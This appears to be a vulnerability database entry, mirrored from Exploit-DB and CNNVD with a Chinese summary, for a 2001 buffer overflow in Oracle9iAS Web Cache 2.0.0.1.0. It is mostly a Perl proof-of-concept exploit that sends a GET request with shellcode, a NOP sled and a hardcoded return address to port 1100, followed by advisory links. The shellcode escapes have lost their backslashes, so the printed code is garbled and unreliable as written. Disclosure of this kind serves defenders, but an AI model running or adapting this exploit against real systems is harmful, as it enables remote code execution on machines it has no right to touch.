https://www.exploit-db.com/exploits/21121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-071

Oracle9iASWebCache2.0.0.1存在缓冲区溢出漏洞。远程攻击者可以借助超长HTTPGET请求执行任意代码。

source: http://www.securityfocus.com/bid/3443/info

A buffer overflow condition can be triggered in Oracle 9iAS Web Cache 2.0.0.1.0 by submitting a malicious URL. This overflow can lead to either the process exiting, the process hanging, or the injection of malicious code. This occurs on all four services provided by Web Cache.

While this vulnerability has been addressed in Oracle 91AS Web Cache 2.0.0.2.0, it has been reported that versions for Microsoft Windows NT are still vulnerable.

#!perl
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:defcom.iyd
# By [email protected] (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>n";
        print "Example: $0 127.0.0.1n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "xebx03x5axebx05xe8xf8xffxffxffx8bxecx8bxc2x83xc0x18x33xc9";
$sploit=$sploit . "x66xb9xb3x80x66x81xf1x80x80x80x30x99x40xe2xfaxaax59";
$sploit=$sploit . "xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1ax5bxa4";
$sploit=$sploit . "xcbx27x51x99xd5x99x66x8fxaax59xc9x27x09x98xd5x99x66";
$sploit=$sploit . "x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";
$msg = "GET " . $sploit . "x90" x (3096 - length($sploit)) . "xe8xf1xc5x05" . " HTTP/1.0nn";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

来源:US-CERTVulnerabilityNote:VU#649979
名称:VU#649979
链接:http://www.kb.cert.org/vuls/id/649979
来源:CERT/CCAdvisory:CA-2001-29
名称:CA-2001-29
链接:http://www.cert.org/advisories/CA-2001-29.html
来源:BUGTRAQ
名称:20011024Oracle9iASWebCacheOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100395487007578&w;=2
来源:BUGTRAQ
名称:20011018def-2001-30
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100342151132277&w;=2
来源:otn.oracle.com
链接:http://otn.oracle.com/deploy/security/pdf/webcache.pdf
来源:XF
名称:oracle-appserver-http-bo(7306)
链接:http://xforce.iss.net/static/7306.php
来源:OSVDB
名称:5534
链接:http://www.osvdb.org/5534